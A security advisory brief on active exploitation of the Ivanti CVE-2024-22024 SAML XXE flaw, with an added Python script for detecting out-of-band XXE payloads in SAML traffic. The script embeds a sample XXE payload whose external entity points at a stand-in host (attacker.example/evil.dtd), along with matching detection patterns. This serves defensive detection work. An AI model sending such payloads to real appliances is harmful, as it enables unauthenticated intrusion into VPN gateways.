Exploitation of Another Ivanti VPN Vulnerability Observed

Last week, Ivanti disclosed a new vulnerability affecting its Connect Secure, Policy Secure, and ZTA gateway appliances. Tracked as CVE-2024-22024, the flaw is an XML external entity (XXE) issue in the SAML component of these appliances and can be exploited to gain access to restricted resources without authentication. At the time of disclosure, Ivanti stated that it had no evidence of active exploitation. However, security researchers including Kevin Beaumont have posted on X disputing that statement and reporting that the flaw is being actively exploited. In particular, security researcher David Vorel replied to Beaumont's post noting that he observed devices being compromised shortly after the latest patches were installed on them, and even after a factory reset had been performed.

Security Officer Comments:
While no actual details of the exploitation attempts have been shared, it is safe to assume that actors will abuse this bug against unpatched appliances, as was the case with the three earlier Ivanti flaws addressed this year. Since Ivanti's disclosure, several PoC exploits for CVE-2024-22024 have been released, lowering the bar for actors to launch attacks. According to attack surface management firm watchTowr, CVE-2024-22024 can be triggered with a basic, publicly available out-of-band XXE payload: an XML DOCTYPE that declares an external entity, causing the appliance's parser to reach out to an attacker-controlled host. Because the SAML endpoint is reachable without authentication, this raises the overall severity and impact of the bug.
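To make the out-of-band XXE signature concrete for defenders, the following is an added example and is not code from the original brief, from watchTowr, or from Ivanti. It decodes SAML messages from request records (redirect binding is DEFLATE + base64 in the query string; POST binding is plain base64 in the form body) and flags any message carrying a DOCTYPE, escalating to an out-of-band XXE indicator when an entity is declared with SYSTEM or PUBLIC and an external URL. A legitimate SAML message never needs a DTD, so any DOCTYPE in this position is worth investigating. The request records, the /saml/sso and /saml/acs paths, the attacker.example host and the payload shape are all constructed for illustration and are not Ivanti log formats or real indicators.

```python
import base64
import binascii
import re
import zlib
from urllib.parse import parse_qs, quote, urlsplit

# Any DTD in a SAML message is suspicious (SAML never needs one); an entity
# declared with SYSTEM/PUBLIC and a URL is the out-of-band XXE signature.
DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.I)
EXTERNAL_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?:%\s*)?\w+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"([a-z][a-z0-9+.-]*://[^"]+)"',
    re.I,
)
SAML_PARAMS = ("SAMLRequest", "SAMLResponse")


def decode_saml_param(value):
    """Decode one SAMLRequest/SAMLResponse value from either binding.

    POST binding is plain base64 of the XML; redirect binding is raw DEFLATE
    then base64 (URL-encoded on the wire, already undone by parse_qs).
    """
    try:
        raw = base64.b64decode(value)
    except (binascii.Error, ValueError):
        return ""
    if raw.lstrip().startswith(b"<"):  # POST binding: already XML
        return raw.decode("utf-8", "replace")
    try:
        return zlib.decompress(raw, -15).decode("utf-8", "replace")
    except zlib.error:  # not deflated either; inspect whatever we have
        return raw.decode("utf-8", "replace")


def classify(xml):
    """Return (indicator, external_url) or None when the message looks clean."""
    m = EXTERNAL_ENTITY_RE.search(xml)
    if m:
        return ("oob-xxe", m.group(1))
    if DOCTYPE_RE.search(xml):
        return ("doctype", None)
    return None


def extract_saml_messages(record):
    """Yield (param_name, decoded_xml) from the query string and form body."""
    for qs in (urlsplit(record["url"]).query, record.get("body", "")):
        for name, values in parse_qs(qs).items():
            if name in SAML_PARAMS:
                for v in values:
                    yield name, decode_saml_param(v)


def scan_records(records):
    """Run the XXE classifier over every SAML message in the records."""
    findings = []
    for rec in records:
        for name, xml in extract_saml_messages(rec):
            hit = classify(xml)
            if hit:
                findings.append({"src": rec["src"], "path": urlsplit(rec["url"]).path,
                                 "param": name, "indicator": hit[0], "external": hit[1]})
    return findings


# --- Constructed sample input (hypothetical endpoints, not Ivanti logs) ---
def redirect_binding(xml):
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw DEFLATE, no zlib header
    data = comp.compress(xml.encode()) + comp.flush()
    return quote(base64.b64encode(data).decode(), safe="")


def post_binding(xml):
    return quote(base64.b64encode(xml.encode()).decode(), safe="")


BENIGN = ('<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
          'ID="_1" Version="2.0"/>')
# Generic out-of-band XXE shape: a parameter entity pulling an external DTD.
XXE = ('<?xml version="1.0"?>'
       '<!DOCTYPE x [<!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd"> %ext;]>'
       '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
       'ID="_2" Version="2.0"/>')

SAMPLE_RECORDS = [
    {"src": "10.0.0.5", "method": "GET",
     "url": "/saml/sso?SAMLRequest=" + redirect_binding(BENIGN)},
    {"src": "203.0.113.9", "method": "GET",
     "url": "/saml/sso?SAMLRequest=" + redirect_binding(XXE)},
    {"src": "198.51.100.7", "method": "POST", "url": "/saml/acs",
     "body": "SAMLResponse=" + post_binding(XXE)},
]

if __name__ == "__main__":
    for f in scan_records(SAMPLE_RECORDS):
        print(f"{f['src']} {f['path']} {f['param']}: {f['indicator']} {f['external'] or ''}")
```

Feed it records extracted from a WAF, reverse proxy or full-packet capture rather than a plain access log, since the POST binding carries the message in the body. A DOCTYPE hit with no external URL still deserves a look: it may be an in-band XXE or a probe, and it should never appear in normal SAML traffic.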

Suggested Corrections:
The development comes after CISA directed federal agencies to disconnect Ivanti Connect Secure and Policy Secure appliances from their networks due to heightened exploitation. Applying the patch does not evict an attacker who is already present: an appliance may have been compromised well before the patch was installed and backdoored with web shells for persistent access. In light of this, security researchers are advising organizations to review their logs for potential exploitation attempts and to treat any appliance that was exposed while unpatched as potentially compromised until verified. A couple of IOCs to look for are included below: